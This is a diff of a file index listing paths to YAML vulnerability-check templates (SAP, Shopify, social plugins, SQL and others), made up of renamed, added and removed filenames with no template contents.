./poc/ruby/ruby-on-rails-framework-exceptions-9920.yaml @@ -84282,13 +84285,14 @@ ./poc/samba/samba-config-9985.yaml ./poc/samba/samba-config-9986.yaml ./poc/samba/samba-detect-9988.yaml -./poc/samba/samba-detect-9989.yaml +./poc/samba/samba-detect-9990.yaml ./poc/samba/samba-swat-panel-9992.yaml ./poc/samba/samba-swat-panel.yaml ./poc/samba/seosamba-webmasters-7db61b9f5c5ddec4aae0861e6db4dd70.yaml ./poc/samba/seosamba-webmasters.yaml ./poc/sap/SAP-NetWeaver-rce.yaml ./poc/sap/SAP-Path-Traversal.yaml +./poc/sap/Sap-redirect.yaml ./poc/sap/click-to-chat-for-whatsapp-552735bf88b0f3e66f060c14f1421abb.yaml ./poc/sap/click-to-chat-for-whatsapp-dc3b7fd11f11d2dc6ef62772dae9ea75.yaml ./poc/sap/click-to-chat-for-whatsapp.yaml @@ -84323,24 +84327,25 @@ ./poc/sap/sap-igs-detect-10038.yaml ./poc/sap/sap-igs-detect-10040.yaml ./poc/sap/sap-igs-detect-10041.yaml +./poc/sap/sap-igs-detect.yaml ./poc/sap/sap-netweaver-as-java-detect.yaml ./poc/sap/sap-netweaver-detect-10042.yaml ./poc/sap/sap-netweaver-detect-10043.yaml ./poc/sap/sap-netweaver-detect-10044.yaml +./poc/sap/sap-netweaver-detect-10046.yaml ./poc/sap/sap-netweaver-detect-10047.yaml ./poc/sap/sap-netweaver-detect-10048.yaml ./poc/sap/sap-netweaver-detect.yaml ./poc/sap/sap-netweaver-info-leak-10049.yaml ./poc/sap/sap-netweaver-info-leak-10050.yaml +./poc/sap/sap-netweaver-info-leak-10051.yaml ./poc/sap/sap-netweaver-info-leak-10052.yaml ./poc/sap/sap-netweaver-portal-10053.yaml ./poc/sap/sap-netweaver-portal-10054.yaml ./poc/sap/sap-netweaver-portal.yaml -./poc/sap/sap-netweaver-rce(1).yaml ./poc/sap/sap-netweaver-webgui-10056.yaml ./poc/sap/sap-netweaver-webgui-10057.yaml ./poc/sap/sap-netweaver-webgui-10059.yaml -./poc/sap/sap-netweaver-webgui.yaml ./poc/sap/sap-netweaver-workflow-10060.yaml ./poc/sap/sap-netweaver-workflow-10061.yaml ./poc/sap/sap-netweaver-workflow.yaml @@ -84348,13 +84353,12 @@ ./poc/sap/sap-nw-abap-info-leakyaml.yaml ./poc/sap/sap-nw-abap-webgui.yaml ./poc/sap/sap-nw-abap.yaml -./poc/sap/sap-recon-detect-10062.yaml +./poc/sap/sap-recon-detect-10063.yaml ./poc/sap/sap-recon-detect.yaml ./poc/sap/sap-redirect-10064.yaml ./poc/sap/sap-redirect-10065.yaml ./poc/sap/sap-redirect-10066.yaml ./poc/sap/sap-redirect-10067.yaml -./poc/sap/sap-redirect.yaml ./poc/sap/sap-router-info-leak.yaml ./poc/sap/sap-router.yaml ./poc/sap/sap-spartacus.yaml @@ -84365,12 +84369,11 @@ ./poc/sap/sap-web-dispatcher-10075.yaml ./poc/sap/sap-web-dispatcher-10076.yaml ./poc/sap/sap-web-dispatcher-10077.yaml +./poc/sap/sap-web-dispatcher-10078.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10069.yaml -./poc/sap/sap-web-dispatcher-admin-portal-10070.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10071.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10072.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10073.yaml -./poc/sap/sap-web-dispatcher.yaml ./poc/sap/sapfiori-panel-1.yaml ./poc/sap/sapfiori-panel-10034.yaml ./poc/sap/sapfiori-panel-2.yaml @@ -84488,7 +84491,7 @@ ./poc/search/ajax-search-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/search/ajax-search-pro-plugin.yaml ./poc/search/ajax-search-pro.yaml -./poc/search/aws-opensearch-login-649.yaml +./poc/search/aws-opensearch-login-650.yaml ./poc/search/aws-opensearch-login.yaml ./poc/search/axublog_v1-search-sqli.yaml ./poc/search/better-search-162a0d80b5d220d9e37c3f6ae9fddb60.yaml @@ -84579,7 +84582,6 @@ ./poc/search/elasticsearch-2.yaml ./poc/search/elasticsearch-5-version.yaml ./poc/search/elasticsearch-7193.yaml -./poc/search/elasticsearch-7194.yaml ./poc/search/elasticsearch-7195.yaml ./poc/search/elasticsearch-7196.yaml ./poc/search/elasticsearch-cluster-health.yaml @@ -84722,7 +84724,6 @@ ./poc/search/search-unleashed-43b47c7d41209b50fd68346a0295170e.yaml ./poc/search/search-unleashed.yaml ./poc/search/searchbar.yaml -./poc/search/searches.yaml ./poc/search/searchiq-486b2d79f520ba9226667882d1e0c61d.yaml ./poc/search/searchiq-5009d6ede19c15ff2d2f30c18e0f60b2.yaml ./poc/search/searchiq-5f115235a8b59c98637592fa393641f7.yaml @@ -84911,7 +84912,6 @@ ./poc/sharepoint/exposed-sharepoint-list-7344.yaml ./poc/sharepoint/exposed-sharepoint-list-7345.yaml ./poc/sharepoint/exposed-sharepoint-list-7346.yaml -./poc/sharepoint/exposed-sharepoint-list-7347.yaml ./poc/sharepoint/microsoft-sharepoint.yaml ./poc/sharepoint/sharepoint-workflow.yaml ./poc/shopify/Shopify-custom-token.yaml @@ -84922,21 +84922,21 @@ ./poc/shopify/import-shopify-to-woocommerce.yaml ./poc/shopify/seoking-shopify-app.yaml ./poc/shopify/shopify-app-installer.yaml -./poc/shopify/shopify-custom-token-11860.yaml +./poc/shopify/shopify-custom-token-10198.yaml ./poc/shopify/shopify-custom-token.yaml ./poc/shopify/shopify-legacy-private-app-token.yaml -./poc/shopify/shopify-private-token-10199.yaml ./poc/shopify/shopify-private-token-11861.yaml ./poc/shopify/shopify-private-token.yaml ./poc/shopify/shopify-public-access.yaml -./poc/shopify/shopify-shared-secret-10200.yaml +./poc/shopify/shopify-shared-secret(1).yaml ./poc/shopify/shopify-shared-secret-11862.yaml ./poc/shopify/shopify-shared-secret.yaml ./poc/shopify/shopify-takeover-10201.yaml -./poc/shopify/shopify-takeover-10203.yaml +./poc/shopify/shopify-takeover-10202.yaml ./poc/shopify/shopify-takeover-10204.yaml ./poc/shopify/shopify-takeover.yaml ./poc/shopify/shopify-token-10205.yaml +./poc/shopify/shopify-token-11863.yaml ./poc/shopify/shopify-token.yaml ./poc/shopify/wpshopify-4052cae896aee1e1f03c5c40f3545719.yaml ./poc/shopify/wpshopify-6df087a86fe2a146356cefcdc927d828.yaml @@ -84957,7 +84957,6 @@ ./poc/smtp/easy-wp-smtp-d3e708a3af2042a6e5853dc6a112ceae.yaml ./poc/smtp/easy-wp-smtp-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/smtp/easy-wp-smtp-e105c23e6058137711e2a12fec6f051e.yaml -./poc/smtp/easy-wp-smtp-listing-7154.yaml ./poc/smtp/easy-wp-smtp-listing-7155.yaml ./poc/smtp/easy-wp-smtp-listing-7156.yaml ./poc/smtp/easy-wp-smtp-listing.yaml @@ -84971,8 +84970,8 @@ ./poc/smtp/fluent-smtp-3b778a9540e9697f042002204cf51030.yaml ./poc/smtp/fluent-smtp-9cf8fafd63ba25b0026079b7736ef163.yaml ./poc/smtp/fluent-smtp.yaml +./poc/smtp/msmtp-config-8966.yaml ./poc/smtp/msmtp-config-8967.yaml -./poc/smtp/msmtp-config.yaml ./poc/smtp/post-smtp-01bed4d8fc18f92e932ac3e1e0f4f5cb.yaml ./poc/smtp/post-smtp-1c60fa32acf2539fdc2944eaf19fbe1e.yaml ./poc/smtp/post-smtp-20b5a1223c8140b840ffff5422240c1d.yaml @@ -85124,7 +85123,7 @@ ./poc/social/api-facebook-422.yaml ./poc/social/api-instagram.yaml ./poc/social/api-linkedin-451.yaml -./poc/social/api-twitter-507.yaml +./poc/social/api-twitter.yaml ./poc/social/autoshare-for-twitter-551ade1835820cb4823a15f064517dfd.yaml ./poc/social/autoshare-for-twitter-5be8f636cffeef15ffba9b239d7e825e.yaml ./poc/social/autoshare-for-twitter-b98496a862f051b9926ad8f184b175ee.yaml @@ -85339,6 +85338,7 @@ ./poc/social/fancy-facebook-comments-82479c99b5c1d4bef5b2b82d059c9af2.yaml ./poc/social/fancy-facebook-comments.yaml ./poc/social/fast-custom-social-share-by-codebard-3eec84cccd13dd6b5189e85549b7e508.yaml +./poc/social/fast-custom-social-share-by-codebard-6c24b9bf73a479831cabafdf17f5368c.yaml ./poc/social/fast-custom-social-share-by-codebard.yaml ./poc/social/feed-instagram-lite-5e48d069c30e77301b13373c2d25e88c.yaml ./poc/social/feed-instagram-lite-60829bf25b1bcb9400fe8f6805943aa8.yaml @@ -85439,6 +85439,7 @@ ./poc/social/instagram-feed-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/instagram-feed-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/instagram-feed-plugin.yaml +./poc/social/instagram-feed.yaml ./poc/social/instagram-for-wordpress-71bb82959fe7ab1e0b311530d80766f1.yaml ./poc/social/instagram-for-wordpress.yaml ./poc/social/instagram-phish.yaml @@ -85490,6 +85491,7 @@ ./poc/social/kiwi-social-share.yaml ./poc/social/lazy-facebook-comments-869b4c99b310f9132fffb57ed8a544a0.yaml ./poc/social/lazy-facebook-comments.yaml +./poc/social/linkedin-id-11853.yaml ./poc/social/linkedin-id.yaml ./poc/social/linkedin-phish.yaml ./poc/social/linkedin.yaml @@ -85869,8 +85871,8 @@ ./poc/social/twitter-plugin-73b27079a4e2a001195d157dd0684416.yaml ./poc/social/twitter-plugin-e1d9dfdea2bd6c473515cb426182f4d6.yaml ./poc/social/twitter-plugin.yaml -./poc/social/twitter-secret(1).yaml ./poc/social/twitter-secret-10862.yaml +./poc/social/twitter-secret-11870.yaml ./poc/social/twitter-secret.yaml ./poc/social/twitterdash-04a2ca407d43736d514540aa0f77c4ac.yaml ./poc/social/twitterdash.yaml @@ -85946,7 +85948,6 @@ ./poc/social/woocommerce-social-media-share-buttons-9e66720a0e1720448903d3312c56aff4.yaml ./poc/social/woocommerce-social-media-share-buttons.yaml ./poc/social/wordpress-instagram-feed-c6f7df5b11c5d64e4d637b8f3456595f.yaml -./poc/social/wordpress-instagram-feed.yaml ./poc/social/wordpress-social-login-0ca1a42367f86c026446999f0cad23d7.yaml ./poc/social/wordpress-social-login-51b5f902099f5eb8d652f8f14b7b3dca.yaml ./poc/social/wordpress-social-login-b781eead4b5ba9bc8c3b062bb99fd9d7.yaml @@ -86002,7 +86003,6 @@ ./poc/social/wp-social-widget-d7b289a4844fbc5f1814a16ab030f4b4.yaml ./poc/social/wp-social-widget.yaml ./poc/social/wp-social.yaml -./poc/social/wp-socialfit-xss-11577.yaml ./poc/social/wp-socialfit-xss-11579.yaml ./poc/social/wp-socialfit-xss-11580.yaml ./poc/social/wp-socialfit-xss-11581.yaml @@ -86052,7 +86052,6 @@ ./poc/sql/74cms-show-sqli.yaml ./poc/sql/74cms-sqli-1.yaml ./poc/sql/74cms-sqli-1.yml -./poc/sql/74cms-sqli-10.yaml ./poc/sql/74cms-sqli-2.yaml ./poc/sql/74cms-sqli-2.yml ./poc/sql/74cms-sqli-8.yaml @@ -87922,8 +87921,8 @@ ./poc/sql/adaptive-images-6cb178fb7dba11c392a882a5aa3528e4.yaml ./poc/sql/adaptive-images-a8360d2b8db5465d06a1177b81db0e77.yaml ./poc/sql/adaptive-images-d5d7320d5d056e2a3cdb2f7eac52cfae.yaml +./poc/sql/adb-backup-enabled-60.yaml ./poc/sql/adb-backup-enabled-61.yaml -./poc/sql/adb-backup-enabled-62.yaml ./poc/sql/adb-backup-enabled-63.yaml ./poc/sql/adb-backup-enabled.yaml ./poc/sql/adbConnect.yaml @@ -88112,8 +88111,8 @@ ./poc/sql/analytics-insights-a52a48fcebcdb3625a324cff9c9c4abe.yaml ./poc/sql/android-debug-database-exposed-312.yaml ./poc/sql/android-debug-database-exposed-313.yaml -./poc/sql/android-debug-database-exposed-314.yaml ./poc/sql/android-debug-database-exposed-315.yaml +./poc/sql/android-debug-database-exposed-316.yaml ./poc/sql/android-debug-database-exposed.yaml ./poc/sql/anfrageformular-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/animate-everything-6477bf18cad6c823db485408d49b337b.yaml @@ -88129,8 +88128,7 @@ ./poc/sql/apache-loadbalancer-364.yaml ./poc/sql/apache-loadbalancer.yaml ./poc/sql/api-abuseipdb-384.yaml -./poc/sql/api-abuseipdb-385.yaml -./poc/sql/api-dbt.yaml +./poc/sql/api-dbt-413.yaml ./poc/sql/api-info-themes-plugins-wp-org-a5ba91db466ae424f41944b08096d121.yaml ./poc/sql/api2cart-bridge-connector-9310170fdba6634de0183ef1f76c24bb.yaml ./poc/sql/apmarketplace-sqlinj.yaml @@ -88390,8 +88388,8 @@ ./poc/sql/buddypress-media-09db3ed600715ed39882e0075ad496ac.yaml ./poc/sql/buddypress-sticky-post-65b7b523caeedbacbd14c75623fa6515.yaml ./poc/sql/buffer-my-post-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/buildbot-panel-803.yaml ./poc/sql/buildbot-panel.yaml -./poc/sql/buildbot-panel.yml ./poc/sql/builder-contact-05cefda973a9af46db8fb07d4529e095.yaml ./poc/sql/builderchild-depot-73cea7db1be46dff05c6aee565d437e4.yaml ./poc/sql/builderchild-market-821582b5b11984a87b87b51e730e4dbe.yaml @@ -88473,7 +88471,8 @@ ./poc/sql/chameleon-css-3726db4d685f3b9bf48ad4097d8a06be.yaml ./poc/sql/chamilo-lms-sqli-1.yaml ./poc/sql/chamilo-lms-sqli-2.yaml -./poc/sql/chamilo-lms-sqli-892.yaml +./poc/sql/chamilo-lms-sqli-891.yaml +./poc/sql/chamilo-lms-sqli.yaml ./poc/sql/change-default-login-logo-url-and-title-fef61a56dbdca375b6c1f6da9b2473d7.yaml ./poc/sql/change-login-logo-4238ce6d433fb89e975842e8fdb72cad.yaml ./poc/sql/change-prices-with-time-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml @@ -88666,7 +88665,6 @@ ./poc/sql/corner-ad-f38db89ce8dd0a9c4d3abb2c40bc849b.yaml ./poc/sql/cost-calculator-builder-21a15cf95c01bc3241db0466bde77a74.yaml ./poc/sql/couchdb-admin-party.yaml -./poc/sql/couchdb-adminparty-1234.yaml ./poc/sql/couchdb-adminparty-1235.yaml ./poc/sql/couchdb-adminparty-1236.yaml ./poc/sql/couchdb-adminparty.yaml @@ -88787,6 +88785,7 @@ ./poc/sql/database-error-6769.yaml ./poc/sql/database-error-6770.yaml ./poc/sql/database-error-6771.yaml +./poc/sql/database-error.yaml ./poc/sql/database-for-cf7-264a0bb0b01fffd382784898cddfc423.yaml ./poc/sql/database-for-cf7.yaml ./poc/sql/database-peek-792b5bc7e10e3ee0787e715784933795.yaml @@ -88803,15 +88802,15 @@ ./poc/sql/date-time-picker-field-f9e5579db8346e24e94a94b4128866ec.yaml ./poc/sql/db-backup-4ce5dcbee48b05bd3f2e0709e37bed82.yaml ./poc/sql/db-backup-lfi-6774.yaml +./poc/sql/db-backup-lfi-6775.yaml ./poc/sql/db-backup-lfi-6776.yaml ./poc/sql/db-backup-lfi.yaml ./poc/sql/db-backup.yaml ./poc/sql/db-schema-1.yaml ./poc/sql/db-schema-2.yaml ./poc/sql/db-schema-3.yaml -./poc/sql/db-schema-6783.yaml -./poc/sql/db-schema-6784.yaml ./poc/sql/db-schema-6785.yaml +./poc/sql/db-schema.yaml ./poc/sql/dbapp-jumpserver-service-useradd.yaml ./poc/sql/dbapp-mingyu-aaa-portal-auth-local-submit-rce.yaml ./poc/sql/dbappsecurity-mingyu-report-user-bypass.yaml @@ -88821,7 +88820,6 @@ ./poc/sql/dbeaver-credentials-6780.yaml ./poc/sql/dbeaver-credentials-6781.yaml ./poc/sql/dbeaver-credentials-6782.yaml -./poc/sql/dbeaver-credentials.yaml ./poc/sql/dbeaver-data-sources.yaml ./poc/sql/dbox-slider-lite-586ec0e258aacc454495dc60bd3b6dd6.yaml ./poc/sql/dbox-slider-lite.yaml @@ -88884,7 +88882,6 @@ ./poc/sql/doneren-met-mollie-5892523ec2265ec2c4db0a351f404d23.yaml ./poc/sql/donorbox-donation-form-7e3cdcd7322fdba36cae6661c4404f33.yaml ./poc/sql/dotnetcms-sqli-7089.yaml -./poc/sql/dotnetcms-sqli.yaml ./poc/sql/dotnetcms-sqli.yml ./poc/sql/download-from-files-a1fa06fbb5bc053d589b33ccdbbdc2f9.yaml ./poc/sql/download-manager-03951c916730f541db7606ebff038a6c.yaml @@ -88933,7 +88930,8 @@ ./poc/sql/dukapress-42d1930756a0a540db942aacdf5f0b12.yaml ./poc/sql/duomicms-sql-injection-7122.yaml ./poc/sql/duomicms-sql-injection-7123.yaml -./poc/sql/duomicms-sql-injection-7125.yaml +./poc/sql/duomicms-sql-injection-7124.yaml +./poc/sql/duomicms-sql-injection.yaml ./poc/sql/duomicms-sqli.yaml ./poc/sql/duomicms-sqli.yml ./poc/sql/duplicate-page-219a16f0f3edb724b96c66d462f64166.yaml @@ -89032,9 +89030,8 @@ ./poc/sql/ecology-oa-filedownloadforoutdoc-sqli.yaml ./poc/sql/ecology-sqli2.yaml ./poc/sql/ecology-syncuserinfo-sqli-7177.yaml -./poc/sql/ecology-syncuserinfo-sqli.yaml ./poc/sql/ecology-syncuserinfo-sqli.yml -./poc/sql/ecology-v8-sqli.yaml +./poc/sql/ecology-v8-sqli-7179.yaml ./poc/sql/ecology-v8-sqli.yml ./poc/sql/ecology-v9-sqli.yaml ./poc/sql/ecology-validate-sqli.yml @@ -89118,6 +89115,7 @@ ./poc/sql/erp-41efa6c5a9fb90d8db7dba7086492b1f.yaml ./poc/sql/error-based-get-sql-injection.yaml ./poc/sql/error-based-post-sql-injection.yaml +./poc/sql/error-based-sql-injection-7249.yaml ./poc/sql/error-based-sql-injection-7250.yaml ./poc/sql/error-based-sql-injection.yaml ./poc/sql/error-log-monitor-6477bf18cad6c823db485408d49b337b.yaml @@ -89138,7 +89136,6 @@ ./poc/sql/etouch-v2-sqli-7266.yaml ./poc/sql/etouch-v2-sqli-7267.yaml ./poc/sql/etouch-v2-sqli-7268.yaml -./poc/sql/etouch-v2-sqli-7269.yaml ./poc/sql/etouch-v2-sqli.yml ./poc/sql/etsy-shop-39c40700fae07d31c1177ca5a04fbddb.yaml ./poc/sql/euclid-94f5de6d90a642c9d8b9cf7e442771db.yaml @@ -89180,10 +89177,10 @@ ./poc/sql/exposed-mysql-initial-7321.yaml ./poc/sql/exposed-mysql-initial-7322.yaml ./poc/sql/exposed-mysql-initial-7323.yaml +./poc/sql/exposed-mysql-initial-7324.yaml ./poc/sql/exposed-sqlite-manager-1.yaml ./poc/sql/exposed-sqlite-manager-2.yaml ./poc/sql/exposed-sqlite-manager-7349.yaml -./poc/sql/exposed-sqlite-manager-7350.yaml ./poc/sql/exposed-sqlite-manager.yaml ./poc/sql/extend-filter-products-by-price-widget-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/external-media-82c751eabb56ab61f925db8610d13723.yaml @@ -89257,9 +89254,8 @@ ./poc/sql/findeo-47ab625c6c1c76a59735d4a765db7e49.yaml ./poc/sql/findgo-525de6dbf7a133cd628bb958a4f7cff5.yaml ./poc/sql/finecms-sqli-7475.yaml -./poc/sql/finecms-sqli.yaml ./poc/sql/finecms-sqli.yml -./poc/sql/firebase-database-7490.yaml +./poc/sql/firebase-database-7489.yaml ./poc/sql/firebase-database-7491.yaml ./poc/sql/firebase-database-extractor.yaml ./poc/sql/firebase-database.yaml @@ -89441,6 +89437,7 @@ ./poc/sql/glorious-services-support-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/glorious-sites-installer-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/glossary-by-codeat-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/glpi-9.3.3-sql-injection(1).yaml ./poc/sql/glpi-9.3.3-sql-injection.yaml ./poc/sql/gm-woo-product-list-widget-c7d55594227f574d6f5e336946adb772.yaml ./poc/sql/go-fetch-jobs-wp-job-manager-6477bf18cad6c823db485408d49b337b.yaml @@ -89511,9 +89508,9 @@ ./poc/sql/happyforms-c4055ba29f08db13e68925f374ba81ef.yaml ./poc/sql/hashbar-wp-notification-bar-f710d7fddbbaea54381581c7b0f07ee4.yaml ./poc/sql/hasium-6477bf18cad6c823db485408d49b337b.yaml -./poc/sql/hasura-graphql-psql-exec-7899.yaml ./poc/sql/hasura-graphql-psql-exec-7900.yaml ./poc/sql/hasura-graphql-psql-exec-7901.yaml +./poc/sql/hasura-graphql-psql-exec-7902.yaml ./poc/sql/haxcan-190425548dd1ddbb7321f1738c27beea.yaml ./poc/sql/hdw-player-video-player-video-gallery-32d133fdb223a5192744426dcadada98.yaml ./poc/sql/header-blind-sql-injection.yaml @@ -89605,6 +89602,7 @@ ./poc/sql/influxdata-influxdb.yaml ./poc/sql/influxdb-detect-8158.yaml ./poc/sql/influxdb-detect-8159.yaml +./poc/sql/influxdb-detect-8160.yaml ./poc/sql/influxdb-detect.yaml ./poc/sql/influxdb-panel.yaml ./poc/sql/influxdb-unauth.yaml @@ -89615,7 +89613,6 @@ ./poc/sql/inpost-gallery-2b2135db85b44564659c6c7c619e8359.yaml ./poc/sql/inpost-gallery-312d14028e31ef0dbaf11b99146fa976.yaml ./poc/sql/insecure-firebase-database-8161.yaml -./poc/sql/insecure-firebase-database.yaml ./poc/sql/insert-or-embed-articulate-content-into-wordpress-1a0ddb62d9bc783fcce955c05e136d15.yaml ./poc/sql/insert-or-embed-articulate-content-into-wordpress-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/insert-or-embed-articulate-content-into-wordpress-b3628f828c30ddc05073db5a4f96a902.yaml @@ -89657,6 +89654,7 @@ ./poc/sql/izeechat-a759e03a3140ab5da9f810ffbdb3a4c2.yaml ./poc/sql/jayj-quicktag-366869a40f4817ab10ef24fadbc9f402.yaml ./poc/sql/jcwp-youtube-channel-embed-a759e03a3140ab5da9f810ffbdb3a4c2.yaml +./poc/sql/jdbc-connection-string-8244.yaml ./poc/sql/jdbc-connection-string-8245.yaml ./poc/sql/jdbc-connection-string-8246.yaml ./poc/sql/jds-portfolio-6477bf18cad6c823db485408d49b337b.yaml @@ -89733,9 +89731,10 @@ ./poc/sql/kbslider-d1db2f87ba0712e1c037d7fa87dbf0bd.yaml ./poc/sql/keep-backup-daily-327b6a6a640edb13bfc96ce69665c4fa.yaml ./poc/sql/kento-post-view-counter-a5fedfc9aea2a7db95d52ff7f7b738e8.yaml -./poc/sql/kevinlab-bems-sqli-8457.yaml ./poc/sql/kevinlab-bems-sqli-8458.yaml ./poc/sql/kevinlab-bems-sqli-8459.yaml +./poc/sql/kevinlab-bems-sqli-8460.yaml +./poc/sql/kevinlab-bems-sqli.yaml ./poc/sql/keyring-277e8db0f83e2ead4ec7d2162ead5590.yaml ./poc/sql/kiddo-7fa1db2a3827aea23db588d86205cc8c.yaml ./poc/sql/kingcomposer-05188a9e745621e726abdb2848d4cfa0.yaml @@ -89953,8 +89952,9 @@ ./poc/sql/moneymasters-02a4bc9438adbcdaa5664f021e38f12e.yaml ./poc/sql/moneytheme-0560e2fcc6071d361ddbd57a75ed8daf.yaml ./poc/sql/mongodb-detect-8919.yaml +./poc/sql/mongodb-detect-8920.yaml ./poc/sql/mongodb-detect-8921.yaml -./poc/sql/mongodb-detect.yaml +./poc/sql/mongodb-ops-manager-8922.yaml ./poc/sql/mongodb-ops-manager-8923.yaml ./poc/sql/mongodb-ops-manager-8924.yaml ./poc/sql/mongodb-ops-manager.yaml @@ -90123,7 +90123,7 @@ ./poc/sql/open-user-map-c2ea245347709cabfb352a7cf46c6db8.yaml ./poc/sql/openerp-database-9275.yaml ./poc/sql/openerp-database-9276.yaml -./poc/sql/openerp-database-9278.yaml +./poc/sql/openerp-database-9277.yaml ./poc/sql/openerp-database.yaml ./poc/sql/opening-hours-9fde58251e15e0ed15dbb0f57c33cf3e.yaml ./poc/sql/openinviter-for-wordpress-16417301b34dbb289c2aca169f54c490.yaml @@ -90137,12 +90137,15 @@ ./poc/sql/option-tree-ae18e342651d194dbc1007204717b118.yaml ./poc/sql/oracle-dbass-detect-9349.yaml ./poc/sql/oracle-dbass-detect-9350.yaml +./poc/sql/oracle-dbass-detect-9351.yaml ./poc/sql/oracle-dbcs-9352.yaml ./poc/sql/oracle-dbcs-9353.yaml ./poc/sql/oracle-dbcs-9354.yaml ./poc/sql/oracle-dbcs-9355.yaml +./poc/sql/oracle-dbcs.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9367.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9369.yaml +./poc/sql/oracle-ebs-sqllog-disclosure-9370.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9371.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9372.yaml ./poc/sql/oracle-ebs-sqllog-disclosure.yaml @@ -90266,7 +90269,6 @@ ./poc/sql/pie-register-1e2d1b7026d2269694eb54e49db13853.yaml ./poc/sql/pie-register-51840cf3f730edb817a845513e726762.yaml ./poc/sql/pie-register-edb5da07e3386d078b8f2dfd3f0d66a1.yaml -./poc/sql/pikpikcusqli.yaml ./poc/sql/pinblocks-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/pinfinity-fcc940cb5d1edc9fa0dbfe45ecb68894.yaml ./poc/sql/piotnet-addons-for-elementor-pro-ff0dbabbd59c76a52ed540a831253c70.yaml @@ -90385,7 +90387,6 @@ ./poc/sql/protected-posts-logout-button-405520b012acd476f3e2a530db3a3e0f.yaml ./poc/sql/protected-posts-logout-button-cfa021969edb2cc77a22385f05d3d58a.yaml ./poc/sql/protected-posts-logout-button-f1f050c9551d531054bfb61b8db76214.yaml -./poc/sql/puppetdb-detect-9717.yaml ./poc/sql/puppetdb-detect-9718.yaml ./poc/sql/puppetdb-detect-9719.yaml ./poc/sql/purosa-6477bf18cad6c823db485408d49b337b.yaml @@ -90617,6 +90618,8 @@ ./poc/sql/scrollsequence-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/seaCMS-sqli.yaml ./poc/sql/seacms-sqli(1).yaml +./poc/sql/seacms-sqli-10103.yaml +./poc/sql/seacms-sqli.yaml ./poc/sql/seacms-sqli.yml ./poc/sql/seacms-v101v11-comment-api-sqli.yaml ./poc/sql/seamless-donations-1c19a09a0db2341131db2ef5655ee08b.yaml @@ -90851,7 +90854,6 @@ ./poc/sql/springboot-h2-db-rce-10456.yaml ./poc/sql/springboot-h2-db-rce-10457.yaml ./poc/sql/springboot-h2-db-rce-10458.yaml -./poc/sql/springboot-h2-db-rce.yaml ./poc/sql/sprout-clients-503c868f614fe8f9ba65b257aadb9679.yaml ./poc/sql/sql-buddy.yaml ./poc/sql/sql-dump-1.yaml @@ -90859,7 +90861,6 @@ ./poc/sql/sql-dump-10496.yaml ./poc/sql/sql-dump-10497.yaml ./poc/sql/sql-dump-10498.yaml -./poc/sql/sql-dump-10499.yaml ./poc/sql/sql-dump-11.yaml ./poc/sql/sql-dump-12.yaml ./poc/sql/sql-dump-13.yaml @@ -90887,7 +90888,6 @@ ./poc/sql/sql-server-report-viewer.yaml ./poc/sql/sql-server-reporting-10507.yaml ./poc/sql/sql-server-reporting-10508.yaml -./poc/sql/sql-server-reporting-10509.yaml ./poc/sql/sql-server-reporting-10510.yaml ./poc/sql/sql-server-reporting.yaml ./poc/sql/sql-shortcode-003f309c7f400c3e24a0ee3414677f42.yaml @@ -90905,6 +90905,7 @@ ./poc/sql/sqli-symfony.yaml ./poc/sql/sqli-vuln-params-deep.yaml ./poc/sql/sqli-vuln-params.yaml +./poc/sql/sqli.yaml ./poc/sql/sqli2.yaml ./poc/sql/sqli_b_sleep.yaml ./poc/sql/sqli_error.yaml @@ -91006,8 +91007,8 @@ ./poc/sql/swing-lite-0f862f55a7ae499633fae3302dbc3d51.yaml ./poc/sql/sydney-toolbox-6ebed23b763fe33f9cdffde1a1db7852.yaml ./poc/sql/symfony-database-config-10614.yaml -./poc/sql/symfony-database-config-10615.yaml ./poc/sql/symfony-database-config-10616.yaml +./poc/sql/symfony-database-config-10617.yaml ./poc/sql/symfony-database-config.yaml ./poc/sql/sync-ecommerce-neo-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/synotec-holdings-sql-injection.yaml @@ -91058,7 +91059,6 @@ ./poc/sql/theplus_elementor_addon-09adbccd120b1c5acc601f143faa1b99.yaml ./poc/sql/thinkit-wp-contact-form-7ed0b79f90893e5693dbcb25c3989983.yaml ./poc/sql/thumbs-db-disclosure-10760.yaml -./poc/sql/thumbs-db-disclosure-10761.yaml ./poc/sql/thumbs-db-disclosure-10762.yaml ./poc/sql/thumbs-db-disclosure-10763.yaml ./poc/sql/thumbs-rating-2551aea37293f7feb377db28af59096c.yaml @@ -91069,7 +91069,9 @@ ./poc/sql/ticket-tailor-cd8902dc00bdb1b49cb56acbeb9ca9e4.yaml ./poc/sql/tidb-native-password.yaml ./poc/sql/tidb-unauth-10770.yaml +./poc/sql/tidb-unauth-10771.yaml ./poc/sql/tidb-unauth-10772.yaml +./poc/sql/tidb-unauth.yaml ./poc/sql/tidio-live-chat-5841edbae5f362f60a79d9cb73e8dd52.yaml ./poc/sql/tier-pricing-table-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/time-based-sql-injection.yaml @@ -91144,6 +91146,7 @@ ./poc/sql/ucmdb-default-login-10868.yaml ./poc/sql/ucmdb-default-login-10869.yaml ./poc/sql/ucmdb-default-login-10870.yaml +./poc/sql/ucmdb-default-login-10871.yaml ./poc/sql/ucontext-8226db0cec7c7280f1367e900997219e.yaml ./poc/sql/ulisting-5dbc01f7b0f6c2a386a3664610ac3e23.yaml ./poc/sql/ulisting-7866bac5db8939bd8423ae7ad6c6a87c.yaml @@ -91586,13 